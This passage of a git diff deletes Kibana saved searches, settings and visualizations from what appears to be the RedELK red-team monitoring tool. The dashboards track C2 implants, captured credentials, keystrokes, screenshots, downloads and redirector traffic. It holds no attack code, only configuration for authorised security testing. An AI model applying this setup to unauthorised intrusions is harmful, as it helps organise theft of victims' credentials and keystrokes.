"{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"events\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"events\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"events_joinleave\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"events_joinleave\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"credentials\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"credentials\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"keystrokes\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"keystrokes\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"downloads\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[4].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"downloads\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"screenshots\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[5].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"screenshots\"}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - _Red Team Operations", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[4].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[5].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 209], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "file.directory", "file.name", "file.url"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"value\":\"downloads\",\"params\":{\"query\":\"downloads\",\"type\":\"phrase\"},\"disabled\":false,\"alias\":null,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"downloads\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Downloads", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 212], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "c2.message", "keystrokes.url"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"keystrokes\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"keystrokes\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Keystrokes", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "3afbdbc0-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 215], "type": "search", "version": "1"} -{"attributes": {"columns": ["creds.realm", "creds.username", "creds.credential", "creds.host", "creds.source"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Credentials", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "3fabe620-6c38-11ea-97d6-55783aed877a", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "credentials", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 217], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "ioc.type", "file.hash.md5", "file.name", "file.size", "ioc.domain"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"ioc\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"ioc\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 IOCs", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 220], "type": "search", "version": "1"} -{"attributes": {"columns": ["module.name", "module.type", "module.last_run.timestamp", "module.last_run.status", "module.last_run.count", "module.last_run.message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"exists\",\"key\":\"module.name\",\"value\":\"exists\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"exists\":{\"field\":\"module.name\"},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [], "title": "RedELK - Modules status", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "654f76a0-9269-11eb-a753-9da683898c26", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 223], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "redir.backend.name", "source.ip", "source.domain", "source.geo.as.organization.name", "source.geo.country_iso_code", "http.request.body.content"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"tags:alarm_*\",\"language\":\"lucene\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - Redirector Traffic - Alarmed", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 225], "type": "search", "version": "1"} -{"attributes": {"columns": ["implant.id", "infra.attack_scenario", "host.name", "user.name", "host.ip_int", "host.ip_ext", "implant.arch", "host.os.name", "host.os.version", "host.os.kernel", "implant.parent_id", "host.geo.as.organization.name", "host.geo.country_iso_code"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 implants overview", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "implantsdb", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 227], "type": "search", "version": "1"} -{"attributes": {"columns": ["iplist.name", "iplist.source", "iplist.ip"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [], "title": "RedELK - IP Lists", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "87530b40-9269-11eb-a753-9da683898c26", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "789bb360-2ab1-11eb-bc47-53169c986c81", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 229], "type": "search", "version": "1"} -{"attributes": {"columns": ["bluechecktype", "message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\n \"highlightAll\": true,\n \"version\": true,\n \"query\": {\n \"language\": \"kuery\",\n \"query\": \"\"\n },\n \"indexRefName\": \"kibanaSavedObjectMeta.searchSourceJSON.index\",\n \"filter\": []\n}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - BlueCheck", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "a4757c90-ce50-11ea-a580-918d4757c08d", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "bluecheck", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1643015939090, 281], "type": "search", "version": "1"} -{"attributes": {"columns": ["attackscenario", "from", "to", "subject", "emailfolder"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [], "title": "RedELK - Emails", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "c1fca0d0-d171-11ea-8ac3-bfcfabda2250", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "email", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 231], "type": "search", "version": "1"} -{"attributes": {"columns": ["user.name", "host.name", "c2.message", "threat.technique.id"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"implant_task\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_task\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [], "title": "RedELK - C2 Tasks", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "cc523820-d021-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 234], "type": "search", "version": "1"} -{"attributes": {"columns": ["c2.message", "host.name", "user.name", "implant.id"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"event.module\",\"params\":{\"query\":\"redelk\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"event.module\":\"redelk\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [], "title": "RedELK - Signals", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 237], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "screenshot.full", "screenshot.thumb"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"screenshots\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"screenshots\"}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Screenshots", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 240], "type": "search", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_settings.json b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_settings.json deleted file mode 100644 index 5b96d205..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_settings.json +++ /dev/null @@ -1,13 +0,0 @@ -{ - "changes": { - "theme:darkMode": true, - "telemetry:optIn": false, - "siem:enableNewsFeed": false, - "siem:defaultIndex": ["apm-*-transaction*","auditbeat-*","endgame-*","filebeat-*","packetbeat-*","winlogbeat-*","rtops-*","redirtraffic-*"], - "defaultIndex": "195a3f00-d04f-11ea-9301-a30a04251ae9", - "defaultRoute": "/app/discover#/view/1c580960-b6a9-11e8-bc1a-cf8fa3255855", - "shortDots:enable": false, - "telemetry:enabled": false, - "timepicker:timeDefaults": "{\"from\": \"now-7d\",\"to\": \"now\"}" - } -} diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_visualization.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_visualization.ndjson deleted file mode 100644 index 5eb99f7c..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_visualization.ndjson +++ /dev/null @@ -1,47 +0,0 @@ -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-12M\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"ioc.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"IOC Type\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - IOC over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "057076f0-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 99], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Screenshots\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30d\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Screenshots\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Screenshots\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"top\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Screenshots over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 101], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Dashboard links internal", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Dashboard links internal\",\"type\":\"markdown\",\"aggs\":[],\"params\":{\"fontSize\":12,\"markdown\":\"**Dashboards** : [Summary](/app/dashboards#/view/02486040-d355-11ea-9301-a30a04251ae9) | [Alarms](/app/dashboards#/view/53b69200-d4e3-11ea-9301-a30a04251ae9) | [Traffic](/app/dashboards#/view/0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba) | [Implants](/app/dashboards#/view/117dbba0-c6f5-11e8-a9c6-cd307b96b1ba) | [Red Team Operations](/app/dashboards#/view/04b87c50-d028-11ea-9301-a30a04251ae9) | [Tasks](/app/dashboards#/view/0523c8a0-d025-11ea-9301-a30a04251ae9) | [Downloads](/app/dashboards#/view/643de010-d04c-11ea-9301-a30a04251ae9) | [Credentials](/app/dashboards#/view/82b865a0-d318-11ea-9301-a30a04251ae9) | [Screenshots](/app/dashboards#/view/a2dcebf0-d316-11ea-9301-a30a04251ae9) | [IOC](/app/dashboards#/view/86643e90-d4e4-11ea-9301-a30a04251ae9) | [TTP](/app/dashboards#/view/3ed7a630-d051-11ea-9301-a30a04251ae9) | [Health](/app/dashboards#/view/509e6a80-926a-11eb-a753-9da683898c26)\",\"openLinksInNewTab\":false}}"}, "coreMigrationVersion": "7.16.3", "id": "0f82b540-d237-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [], "sort": [1642171875895, 102], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Top computers with new implants", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":17,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Hostname\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Username\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Top computers with new implants\"}"}, "coreMigrationVersion": "7.16.3", "id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171875895, 105], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"NOT (redir.backend.name: c2*)\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic - Decoy", "uiStateJSON": "{\"mapCenter\":[32.93684850365019,0.7170999376103283],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Yellow to Red\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

